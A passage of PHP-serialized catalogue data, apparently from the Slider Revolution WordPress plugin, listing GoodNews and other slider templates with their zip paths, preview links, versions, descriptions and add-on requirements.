help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:4:{i:0;s:8:\"carousel\";i:1;s:6:\"slider\";i:2;s:4:\"hero\";i:3;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:152;a:25:{s:2:\"id\";s:3:\"155\";s:5:\"title\";s:13:\"GoodNews Menu\";s:5:\"alias\";s:12:\"goodnewsmenu\";s:3:\"zip\";s:22:\"packs/goodnewsmenu.zip\";s:3:\"uid\";s:32:\"4cbc82501ff340fcdc0acf7eb3ba2640\";s:3:\"img\";s:23:\"goodnewsmenu/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:153;a:25:{s:2:\"id\";s:3:\"156\";s:5:\"title\";s:15:\"GoodNews Header\";s:5:\"alias\";s:14:\"goodnewsheader\";s:3:\"zip\";s:24:\"packs/goodnewsheader.zip\";s:3:\"uid\";s:32:\"c6660b6bdbf596f38466f569596f5259\";s:3:\"img\";s:25:\"goodnewsheader/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:154;a:25:{s:2:\"id\";s:3:\"157\";s:5:\"title\";s:18:\"GoodNews Whats Hot\";s:5:\"alias\";s:16:\"goodnewswhatshot\";s:3:\"zip\";s:26:\"packs/goodnewswhatshot.zip\";s:3:\"uid\";s:32:\"cb841ce64a99a6644adab049cf5405cd\";s:3:\"img\";s:27:\"goodnewswhatshot/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:155;a:26:{s:2:\"id\";s:3:\"158\";s:5:\"title\";s:17:\"GoodNews Featured\";s:5:\"alias\";s:16:\"goodnewsfeatured\";s:3:\"zip\";s:26:\"packs/goodnewsfeatured.zip\";s:3:\"uid\";s:32:\"00bde4b09e3700da7183999eaf137ccc\";s:3:\"img\";s:27:\"goodnewsfeatured/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:156;a:26:{s:2:\"id\";s:3:\"159\";s:5:\"title\";s:18:\"GoodNews Spotlight\";s:5:\"alias\";s:17:\"goodnewsspotlight\";s:3:\"zip\";s:27:\"packs/goodnewsspotlight.zip\";s:3:\"uid\";s:32:\"138076241a828e1c5764379944755f2b\";s:3:\"img\";s:28:\"goodnewsspotlight/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.4\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:157;a:25:{s:2:\"id\";s:3:\"160\";s:5:\"title\";s:17:\"GoodNews Carousel\";s:5:\"alias\";s:16:\"goodnewscarousel\";s:3:\"zip\";s:26:\"packs/goodnewscarousel.zip\";s:3:\"uid\";s:32:\"d29d4460a6015e30d08d2714232d3768\";s:3:\"img\";s:27:\"goodnewscarousel/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:158;a:25:{s:2:\"id\";s:3:\"161\";s:5:\"title\";s:16:\"GoodNews Callout\";s:5:\"alias\";s:15:\"goodnewscallout\";s:3:\"zip\";s:25:\"packs/goodnewscallout.zip\";s:3:\"uid\";s:32:\"d9568b3193e96577fae630b3a6728785\";s:3:\"img\";s:26:\"goodnewscallout/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:159;a:25:{s:2:\"id\";s:3:\"162\";s:5:\"title\";s:15:\"GoodNews Footer\";s:5:\"alias\";s:14:\"goodnewsfooter\";s:3:\"zip\";s:24:\"packs/goodnewsfooter.zip\";s:3:\"uid\";s:32:\"34f43f891cb8d55375149dc4bbc38298\";s:3:\"img\";s:25:\"goodnewsfooter/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"GoodNews One-Pager\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"7\";s:9:\"installed\";b:0;}i:160;a:25:{s:2:\"id\";s:3:\"163\";s:5:\"title\";s:29:\"GoodNews Content Page Package\";s:5:\"alias\";s:29:\"goodnews-content-page-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:29:\"goodnews-content-page-package\";s:3:\"img\";s:55:\"packages/templatepack_goodnews_content_page_package.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:6:\"slider\";i:1;s:4:\"hero\";i:2;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:161;a:25:{s:2:\"id\";s:3:\"164\";s:5:\"title\";s:18:\"GoodNews Menu Back\";s:5:\"alias\";s:16:\"goodnewsmenuback\";s:3:\"zip\";s:26:\"packs/goodnewsmenuback.zip\";s:3:\"uid\";s:32:\"1340d1aeefba497a7d404d12a1fceed4\";s:3:\"img\";s:27:\"goodnewsmenuback/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:162;a:25:{s:2:\"id\";s:3:\"165\";s:5:\"title\";s:20:\"GoodNews Blog Header\";s:5:\"alias\";s:18:\"goodnewsblogheader\";s:3:\"zip\";s:28:\"packs/goodnewsblogheader.zip\";s:3:\"uid\";s:32:\"abc4d7c1e48475c6def05f1f6d8bf564\";s:3:\"img\";s:29:\"goodnewsblogheader/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:163;a:25:{s:2:\"id\";s:3:\"166\";s:5:\"title\";s:21:\"GoodNews Blog Content\";s:5:\"alias\";s:19:\"goodnewsblogcontent\";s:3:\"zip\";s:29:\"packs/goodnewsblogcontent.zip\";s:3:\"uid\";s:32:\"bbf34563da6db2779c29599b503b07e9\";s:3:\"img\";s:30:\"goodnewsblogcontent/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:164;a:25:{s:2:\"id\";s:3:\"167\";s:5:\"title\";s:21:\"GoodNews Testimonials\";s:5:\"alias\";s:20:\"goodnewstestimonials\";s:3:\"zip\";s:30:\"packs/goodnewstestimonials.zip\";s:3:\"uid\";s:32:\"606b7336e86f69c567542d3f43712b56\";s:3:\"img\";s:31:\"goodnewstestimonials/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:165;a:25:{s:2:\"id\";s:3:\"168\";s:5:\"title\";s:20:\"GoodNews Blog Footer\";s:5:\"alias\";s:18:\"goodnewsblogfooter\";s:3:\"zip\";s:28:\"packs/goodnewsblogfooter.zip\";s:3:\"uid\";s:32:\"1fb88aecfb116fde67ce8d52bd3b5f05\";s:3:\"img\";s:29:\"goodnewsblogfooter/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:166;a:22:{s:2:\"id\";s:3:\"169\";s:5:\"title\";s:19:\"Before After Slider\";s:5:\"alias\";s:17:\"beforeafterslider\";s:3:\"zip\";s:21:\"beforeafterslider.zip\";s:3:\"uid\";s:32:\"6e615091a1fc3037c24b985ce5136fb2\";s:3:\"img\";s:28:\"beforeafterslider/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/before-after-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.4.3.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:201:\"<span class=\"ttm_content\">This is the example slider for our Before / After Add-On that allows you to create unique presentations with a comparing functionality.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:320:\"<span class=\"ttm_content\">How to install <a href=\"https://www.themepunch.com/slider-revolution/install-addons/\" target=\"_blank\">Add-Ons</a>.</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-beforeafter-addon\\/revslider-beforeafter-addon.php\",\"name\":\"Before After AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:167;a:22:{s:2:\"id\";s:3:\"170\";s:5:\"title\";s:16:\"Product Showcase\";s:5:\"alias\";s:15:\"productshowcase\";s:3:\"zip\";s:19:\"productshowcase.zip\";s:3:\"uid\";s:32:\"a43447670260aaa7e8ff66cedfddb57a\";s:3:\"img\";s:26:\"productshowcase/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/wordpress-product-showcase-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:165:\"<span class=\"ttm_content\">Looking to sell products effectively? Our product showcase slider is just what you are looking for!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:168;a:22:{s:2:\"id\";s:3:\"171\";s:5:\"title\";s:23:\"Overexposure Transition\";s:5:\"alias\";s:22:\"overexposuretransition\";s:3:\"zip\";s:26:\"overexposuretransition.zip\";s:3:\"uid\";s:32:\"13f16bbe6c6d646c7d0cb817a0d3d181\";s:3:\"img\";s:33:\"overexposuretransition/slide1.jpg\";s:7:\"preview\";s:65:\"https://revolution.themepunch.com/overexposure-transition-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:155:\"<span class=\"ttm_content\">Subtle overexposure transitions and smooth color fade effects make this slider stand out.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:320:\"<span class=\"ttm_content\">How to install <a href=\"https://www.themepunch.com/slider-revolution/install-addons/\" target=\"_blank\">Add-Ons</a>.</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 